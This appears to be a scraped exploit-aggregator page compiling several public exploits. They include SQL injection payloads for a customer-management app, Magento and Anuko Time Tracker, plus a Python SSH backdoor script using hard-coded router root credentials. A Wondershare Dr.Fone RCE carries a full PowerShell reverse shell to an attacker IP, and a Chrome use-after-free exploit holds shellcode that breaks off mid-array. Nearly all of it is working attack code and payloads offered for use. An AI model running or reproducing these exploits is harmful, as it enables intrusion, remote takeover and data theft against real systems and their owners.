SQLmap to extract the data from the database: sqlmap.py -r poc.txt --dbms=mysql 3. Example payload: ---------------------- (error-based) customer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' 4. Burpsuite request: ---------------------- GET /mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27 HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Cookie: PHPSESSID=rf50l831r3vn4ho0g6aef189bt Referer: http://localhost/mims/managecustomer.php User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
HireHackking
# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor # Exploit Author: LiquidWorm #!/usr/bin/env python3 # # # USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor # # # Vendor: Jinan USR IOT Technology Limited # Product web page: https://www.pusr.com | https://www.usriot.com # Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808) # 1.2.7 (USR-LG220-L) # # Summary: USR-G806 is a industrial 4G wireless LTE router which provides # a solution for users to connect own device to 4G network via WiFi interface # or Ethernet interface. USR-G806 adopts high performance embedded CPU which # can support 580MHz working frequency and can be widely used in Smart Grid, # Smart Home, public bus and Vending machine for data transmission at high # speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG, # flow control and has many advantages including high reliability, simple # operation, reasonable price. USR-G806 supports WAN interface, LAN interface, # WLAN interface, 4G interface. USR-G806 provides various networking mode # to help user establish own network. # # Desc: The USR IOT industrial router is vulnerable to hard-coded credentials # within its Linux distribution image. These sets of credentials are never # exposed to the end-user and cannot be changed through any normal operation # of the device. The 'usr' account with password 'www.usr.cn' has the highest # privileges on the device. The password is also the default WLAN password. # Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022 # # ------------------------------------------------------------------------- # lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14 # # --Got rewt! # # id;id root;pwd # uid=0(usr) gid=0(usr) # uid=2(root) gid=2(root) groups=2(root) # /root # # crontab -l # */2 * * * * /etc/ltedial # */20 * * * * /etc/init.d/Net_4G_Check.sh # */15 * * * * /etc/test_log.sh # */120 * * * * /etc/pddns/pddns_start.sh start & # 44 4 * * * /etc/init.d/sysreboot.sh & # */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop; # 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop; # cat /tmp/usrlte_info # Local time is Fri Apr 15 05:38:56 2022 # (loop) # IMEI Number:8*************1 # Operator information:********Telecom # signal intensity:normal(20) # # Software version number:E*****************G # SIM Card CIMI number:4*************7 # SIM Card number:8******************6 # Short message service center number:"+8**********1" # system information:4G Mode # PDP protocol:"IPV4V6" # CREG:register # Check ME password:READY # base station information:"4**D","7*****B" # cat /tmp/usrlte_info_imsi # 4*************7 # # exit # # lqwrm@metalgear:~$ # ------------------------------------------------------------------------- # # Tested on: GNU/Linux 3.10.14 (mips) # OpenWrt/Linaro GCC 4.8-2014.04 # Ralink SoC MT7628 PCIe RC mode # BusyBox v1.22.1 # uhttpd # Lua # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5705 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php # # # 10.04.2022 # import paramiko as bah import sys as baaaaaah bnr=''' ▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄ █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██ █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪ ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌· ▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄ ▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █· ▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄ ██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌ ·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀ ▀▄ █·▪ ▪ •██ ▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪ ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌· ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ · ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀. ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ ▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀ ''' print(bnr) if len(baaaaaah.argv)<2: print('--Gief me an IP.') exit(0) adrs=baaaaaah.argv[1] unme='usr' pwrd='www.usr.cn' rsh=bah.SSHClient() rsh.set_missing_host_key_policy(bah.AutoAddPolicy()) try: rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook. print('--Got rewt!') except: print('--Backdoor removed.') exit(-1) while True: cmnd=input('# ') if cmnd=='exit': rsh.exec_command('exit') break stdin,stdout,stderr = rsh.exec_command(cmnd) print(stdout.read().decode().strip()) rsh.close()
HireHackking

Magento eCommerce CE v2.3.5-p2 - Blind SQLi

HACKER · %s · %s

Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi # Date: 2021-4-21 # Exploit Author: Aydin Naserifard # Vendor Homepage: https://www.adobe.com/ # Software Link: https://github.com/magento/magento2/releases/tag/2.3.5-p2 # Version: [2.3.5-p2] # Tested on: [2.3.5-p2] POC: 1)PUT /rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23 2)POST /cargo/index/validateqty [quote_id parameter] quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23
HireHackking

Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE) # Date: 4/27/2022 # Exploit Author: Netanel Cohen & Tomer Peled # Vendor Homepage: https://drfone.wondershare.net/ # Software Link: https://download.wondershare.net/drfone_full4008.exe # Version: up to 12.0.7 # Tested on: Windows 10 # CVE : 2021-44596 # References: https://github.com/netanelc305/WonderShell Wondershare LTD Dr. Fone as of 2021-12-06 version is affected by Remote code execution. Due to software design flaws an unauthenticated user can communicate over UDP with the "InstallAssistService.exe" service(the service is running under SYSTEM privileges) and manipulate it to execute malicious executable without any validation from a remote location and gain SYSTEM privileges #!/usr/bin/python3 # stty raw -echo; (stty size; cat) | nc -lvnp 1337 import socket payload = """WindowsPowerShell\\v1.0\powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.14.129',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" Admin 12345""" byte_message = bytes(payload, "utf-8") for i in range(1024,65500): opened_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) opened_socket.sendto(byte_message, ("192.168.14.137", i)) print(f"Trying port {i}",end="\r")
HireHackking

Anuko Time Tracker - SQLi (Authenticated)

HACKER · %s · %s

# Exploit Title: Anuko Time Tracker - SQLi (Authenticated) # Date: 2022-05-03 # Exploit Author: Altelus # Vendor Homepage: https://www.anuko.com/ # Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d # Version: Anuko Time Tracker 1.20.0.5640 # Tested on: Linux # CVE : CVE-2022-24707 # An authenticated user can exploit an SQL Injection vulnerability on the Puncher plugin if its enabled. # User has to start the puncher and stop it but upon stopping an additional parameter 'date' must be passed. # The 'date' parameter is then injected with SQL payload for leaking database contents. from time import time import requests import argparse import re from bs4 import BeautifulSoup from datetime import datetime, timedelta def get_puncher_page(): punch_txt = r_client.get(host + "/puncher.php").text if "Feature is disabled" in punch_txt: print("[-] Puncher feature is disabled.") exit(0) print("[+] Puncher feature is enabled. Picking a project...") soup = BeautifulSoup(punch_txt, features="lxml") time_record_form = soup.find("select", {"name" : "project", "id" : "project"}) project_list = time_record_form.findAll("option") if len(project_list) <= 1: print("[-] No project to choose from") exit(0) f_proj = project_list[1] print("[*] Picking the first project in the option: [{} - {}]".format(f_proj['value'], f_proj.text)) return f_proj['value'] def login(username, password): global r_client data = { "login" : username, "password" : password, "btn_login" : "Login", } login_txt = r_client.post(host + "/login.php", data=data).text if "Incorrect" in login_txt: print("[-] Failed to login. Credentials are not correct.") exit(0) print("[+] Login successful!") def start_puncher(project_id): global r_client data = { "project": project_id, "btn_start": "Start", "browser_today" : "", "browser_time" : "04:00", "date": "{}-{}-{}".format(date.year, date.month, date.day) } headers = { "Referer" : host + "/puncher.php" } start_p = r_client.post(host + "/puncher.php", data=data, headers=headers).text if "Uncompleted entry already" in start_p: print("[-] A running puncher entry is seen. Exiting") exit(0) print("[*] Puncher started. Getting id added...") puncher_p = r_client.get(host + "/puncher.php?date={}-{}-{}".format(date.year, date.month, date.day)).text time_edit_ids = re.findall("time_edit.php\?id=\d+",puncher_p) time_edit_ids.sort() latest_id = time_edit_ids[-1].split("=")[1] return latest_id def stop_puncher_sqli(project_id, sqli=""): get_all_tables = "SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()" if sqli == "": sqli = get_all_tables new_date = date+timedelta(minutes=10) data = { "btn_stop": "Stop", "browser_today" : "", "browser_time" : "04:10", "date": "{}-{}-{}', comment=(({})), date='{}-{}-{}".format(date.year, date.month, date.day, sqli, date.year, date.month, date.day) } headers = { "Referer" : host + "/puncher.php" } stop_p = r_client.post(host + "/puncher.php", data=data, headers=headers,allow_redirects=False).text print("[*] Puncher stopped") def get_puncher_result(puncher_id): time_edit_p = r_client.get(host + "/time_edit.php?id={}".format(puncher_id)).text soup = BeautifulSoup(time_edit_p, features="lxml") note_content = soup.find("textarea", {"name" : "note", "id" : "note"}) print("[+] Leaked: {}".format(note_content.text)) def delete_puncher_entry(puncher_id): data = { "delete_button" : "Delete", "id" : puncher_id } headers = { "Referer" : "http://10.0.2.15/time_delete.php?id={}".format(puncher_id) } del_p = r_client.post(host + "/time_delete.php?id={}".format(puncher_id), data=data, headers=headers) print("[*] Puncher {} deleted".format(puncher_id)) parser = argparse.ArgumentParser() parser.add_argument('--username', required=True, help="Anuko Timetracker username") parser.add_argument('--password', required=True, help="Anuko Timetracker password") parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000") parser.add_argument('--sqli', required=False, help="SQL query to run. Defaults to getting all tables") args = parser.parse_args() r_client = requests.Session() host = args.host date = datetime.now() username = args.username password = args.password login(username, password) proj_id = get_puncher_page() puncher_id = start_puncher(proj_id) sqli="" if args.sqli != None: sqli = args.sqli stop_puncher_sqli(proj_id, sqli=sqli) get_puncher_result(puncher_id) delete_puncher_entry(puncher_id)
HireHackking

Google Chrome 78.0.3904.70 - Remote Code Execution

HACKER · %s · %s

# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution # Date: 2022-05-03 # Exploit Author: deadlock (Forrest Orr) # Type: RCE # Platform: Windows # Website: https://forrest-orr.net # Twitter: https://twitter.com/_ForrestOrr # Vendor Homepage: https://www.google.com/chrome/ # Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip # Versions: Chrome 76 - 78.0.3904.70 # Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 x64 # CVE: CVE-2019-13720 # Bypasses: DEP, High Entropy ASLR, CFG, CET # Github: https://github.com/forrest-orr/WizardOpium <html> <script> /*;; --------------------------------------------------------------------- | ;;;; Google Chrome Use After Free - CVE-2019-13720 - Wizard Opium | ;;;; --------------------------------------------------------------------- | ;;;; Author: deadlock (Forrest Orr) - 2022 | ;;;; --------------------------------------------------------------------- | ;;;; Licensed under GNU GPLv3 | ;;;; --------------------------------------------------------------------- | ;;;; Tested with Chrome 76.0.3809.132 Official Build 64-bit on Windows 10 | ;;;; 64-bit with CPU core counts: | ;;;; ~ 16 cores (non-virtualized) | works | ;;;; ~ 4 cores (virtualized) | works | ;;;; ~ 2 cores (virtualized) | works | ;;;; ~ 1 core (virtualized) | fails | ;;;; | ;;;; All of these tests finished successfully with a 95%+ success rate | ;;;; with the exception of the 1 core tests, which fail with a 100% | ;;;; frequency. Due to the nature of the exploit as both a UAF highly | ;;;; sensitive to the state of the heap and a race condition, it appears | ;;;; that a single core is unable to reliably reproduce the UAF or any | ;;;; kind of consistency in the heap between executions. | ;;;; --------------------------------------------------------------------- | ;;;; Bypasses: DEP, High Entropy ASLR, CFG, CET | ;;;; --------------------------------------------------------------------- | ;;;; ## Sandboxing | ;;;; ~ Chrome uses an isolated content child proces running under a | ;;;; restricted token below Low Integrity to render JavaScript. | ;;;; ~ Child process creation is restricted via Windows exploit | ;;;; mitigation features on the OS level for Chrome renderers. | ;;;; ~ The original WizardOpium chain used a win32k LPE exploit as a | ;;;; sandbox escape (this was limited to Windows 7 since in newer | ;;;; versions of Windows win32k syscalls are locked in Chrome for | ;;;; security purposes). | ;;;; ~ Run Chrome with the "--no-sandbox" parameter in order to execute | ;;;; the WinExec shellcode within this exploit source. | ;;;; --------------------------------------------------------------------- | ;;;; ## Notes | ;;;; ~ This UAF targets the PartitionAlloc heap and abuses the freelist | ;;;; for both infoleaks and R/W primitives. | ;;;; ~ The exploit should in theory work in any version of Chrome up to | ;;;; 78.0.3904.87 but has only been tested on 76.0.3809.132. | ;;;; ~ WASM JIT/egghunter design for code execution: a WASM module is | ;;;; initialized resulting in the creation of a single page of +RWX | ;;;; JIT memory. This is then overwritten with a 673 byte egghunter | ;;;; shellcode. | ;;;; ~ The egghunter will scan through all committed +RW regions of | ;;;; private memory within the compromised chrome.exe renderer process | ;;;; and mark any region it identifies as +RWX which contains the egg | ;;;; QWORD bytes and subsequentially execute it via a CALL instruction. | ;;;; ~ Shellcode used within this exploit should be encoded as a Uint8 | ;;;; array prefixed by the following egg QWORD bytes: | ;;;; 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 | ;;;; --------------------------------------------------------------------- | ;;;; ## Credits | ;;;; ~ Kaspersky for identifying and analyzing the WizardOpium exploit | ;;;; chain in the wild. | ;;;; -------------------------------------------------------------------- */ const Shellcode = new Uint8Array([ 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x90, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0x90, 0xe8, 0x55, 0x00, 0x00, 0x00, 0x90, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xea, 0x6f, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa1, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2, 0x05, 0x00, 0x00, 0x00, 0x48, 0xb9, 0x61, 0x64, 0x2e, 0x65, 0x78, 0x65, 0x00, 0x00, 0x51, 0x48, 0xb9, 0x57, 0x53, 0x5c, 0x6e, 0x6f, 0x74, 0x65, 0x70, 0x51, 0x48, 0xb9, 0x43, 0x3a, 0x5c, 0x57, 0x49, 0x4e, 0x44, 0x4f, 0x51, 0x48, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]); const Egghunter = new Uint8Array([ 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0xe8, 0x21, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xd2, 0x33, 0x0e, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6e, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc5, 0x4d, 0x31, 0xe4, 0x4d, 0x31, 0xf6, 0x4d, 0x31, 0xff, 0x4d, 0x85, 0xff, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x4d, 0x01, 0xf4, 0x49, 0xc7, 0xc0, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x41, 0xff, 0xd5, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x83, 0xf8, 0x30, 0x0f, 0x85, 0xc3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x4c, 0x8b, 0x70, 0x18, 0x4c, 0x8b, 0x20, 0x81, 0x78, 0x28, 0x00, 0x00, 0x02, 0x00, 0x75, 0xb1, 0x81, 0x78, 0x20, 0x00, 0x10, 0x00, 0x00, 0x75, 0xa8, 0x83, 0x78, 0x24, 0x04, 0x75, 0xa2, 0x4c, 0x89, 0xf1, 0x48, 0x83, 0xe9, 0x08, 0x48, 0x31, 0xd2, 0x48, 0xff, 0xca, 0x48, 0xbb, 0x10, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0xff, 0xc3, 0x48, 0xff, 0xc2, 0x48, 0x39, 0xca, 0x7d, 0x80, 0x49, 0x39, 0x1c, 0x14, 0x74, 0x02, 0xeb, 0xf0, 0x4d, 0x8d, 0x3c, 0x14, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x08, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7f, 0x13, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x10, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7c, 0x05, 0x4d, 0x31, 0xff, 0xeb, 0xcb, 0x48, 0x31, 0xc9, 0x49, 0x89, 0x0c, 0x14, 0x48, 0xc7, 0xc2, 0x3c, 0xd1, 0x38, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x9f, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4d, 0xc0, 0x49, 0xc7, 0xc0, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x48, 0x8b, 0x52, 0x18, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0x49, 0x83, 0xc7, 0x08, 0x41, 0xff, 0xd7, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0x18, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x76, 0x7e, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0x65, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x75, 0x4c, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 